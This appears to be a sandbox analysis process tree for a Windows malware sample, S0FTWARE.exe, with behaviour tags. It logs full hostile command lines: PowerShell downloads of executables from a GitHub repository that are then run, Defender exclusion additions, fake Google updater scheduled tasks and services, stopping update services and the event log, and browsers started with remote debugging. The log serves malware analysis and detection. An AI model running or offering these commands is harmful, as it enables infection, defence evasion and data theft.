C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbc9dbdcf8,0x7ffbc9dbdd04,0x7ffbc9dbdd105⤵PID:768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1876,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1852 /prefetch:25⤵PID:3980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2256,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2280 /prefetch:35⤵PID:1576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2380 /prefetch:85⤵PID:2448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3264 /prefetch:15⤵
- Uses browser remote debugging
PID:4044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3500 /prefetch:15⤵
- Uses browser remote debugging
PID:4920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4308,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4336 /prefetch:25⤵
- Uses browser remote debugging
PID:1468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4620,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4708 /prefetch:15⤵
- Uses browser remote debugging
PID:5452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5328,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5340 /prefetch:85⤵PID:3584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5440,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5448 /prefetch:85⤵PID:4896
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
PID:880 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5020 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffbd1dbf208,0x7ffbd1dbf214,0x7ffbd1dbf2206⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=2976 /prefetch:36⤵PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2948,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=2944 /prefetch:26⤵PID:2348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2268,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=2780 /prefetch:86⤵PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:16⤵
- Uses browser remote debugging
PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3536,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:16⤵
- Uses browser remote debugging
PID:6008
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\o8qq1" & exit4⤵PID:6136
-
C:\Windows\SysWOW64\timeout.exetimeout /t 115⤵
- Delays execution with timeout.exe
PID:4048
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\opigwliiren.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\opigwliiren.exe'"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
-
C:\Users\Admin\AppData\Local\glrfnz\aaccaa.exe"C:\Users\Admin\AppData\Local\glrfnz\aaccaa.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5660 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3204
-
-
-
-
C:\Users\Admin\AppData\Local\glrfnz\opigwliiren.exe"C:\Users\Admin\AppData\Local\glrfnz\opigwliiren.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4496 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5012
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6044
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:3600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2100
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:5868
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:5820
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3392
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5664
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6000
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"4⤵
- Launches sc.exe
PID:3204
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:5688
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:5748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"4⤵
- Launches sc.exe
PID:512
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:2856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5952
-
C:\Users\Admin\AppData\Roaming\service.exeC:\Users\Admin\AppData\Roaming\service.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f2⤵
- System Location Discovery: System Language Discovery
PID:5664 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3588
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4960
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5472
-
C:\Users\Admin\Desktop\egg\S0FTWARE.exe"C:\Users\Admin\Desktop\egg\S0FTWARE.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3336 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\eicgfz', 'C:\Users', 'C:\ProgramData'"2⤵PID:5488
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\eicgfz', 'C:\Users', 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\kbfkegxz.exe'"2⤵PID:3928
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\kbfkegxz.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\bxawtnntp.exe'"2⤵PID:5416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\bxawtnntp.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
-
-
C:\Users\Admin\AppData\Local\eicgfz\kbfkegxz.exe"C:\Users\Admin\AppData\Local\eicgfz\kbfkegxz.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
PID:1844 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbca40dcf8,0x7ffbca40dd04,0x7ffbca40dd104⤵PID:4152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1564,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2212 /prefetch:34⤵PID:3004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2108,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2104 /prefetch:24⤵PID:3504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2544 /prefetch:84⤵PID:5884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3260 /prefetch:14⤵
- Uses browser remote debugging
PID:4640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3288 /prefetch:14⤵
- Uses browser remote debugging
PID:700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4280 /prefetch:24⤵
- Uses browser remote debugging
PID:5848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4628,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4596 /prefetch:14⤵
- Uses browser remote debugging
PID:5172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5172,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5184 /prefetch:84⤵PID:1140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5508,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5520 /prefetch:84⤵PID:4728
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\niikyecwpyo.exe'"2⤵PID:4024
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\niikyecwpyo.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:1092
-
-
-
C:\Users\Admin\AppData\Local\eicgfz\bxawtnntp.exe"C:\Users\Admin\AppData\Local\eicgfz\bxawtnntp.exe"2⤵PID:4468
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f3⤵PID:4820
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5032
-
-
-
-
C:\Users\Admin\AppData\Local\eicgfz\niikyecwpyo.exe"C:\Users\Admin\AppData\Local\eicgfz\niikyecwpyo.exe"2⤵PID:5980
-
-
C:\ProgramData\GoogleUP\Chrome\Updater.exeC:\ProgramData\GoogleUP\Chrome\Updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4332 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2428
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1996
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3528
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2152
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1584
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4292
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5012
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Users\Admin\Desktop\egg\S0FTWARE.exe"C:\Users\Admin\Desktop\egg\S0FTWARE.exe"1⤵PID:3512
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\tiyephlpp', 'C:\Users', 'C:\ProgramData'"2⤵PID:2152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\tiyephlpp', 'C:\Users', 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\asxvoapy.exe'"2⤵PID:4128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\asxvoapy.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:3560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\ezshtssebmgo.exe'"2⤵PID:2044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\ezshtssebmgo.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:5976
-
-
-
C:\Users\Admin\AppData\Local\tiyephlpp\asxvoapy.exe"C:\Users\Admin\AppData\Local\tiyephlpp\asxvoapy.exe"2⤵PID:3540
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
PID:3476 -
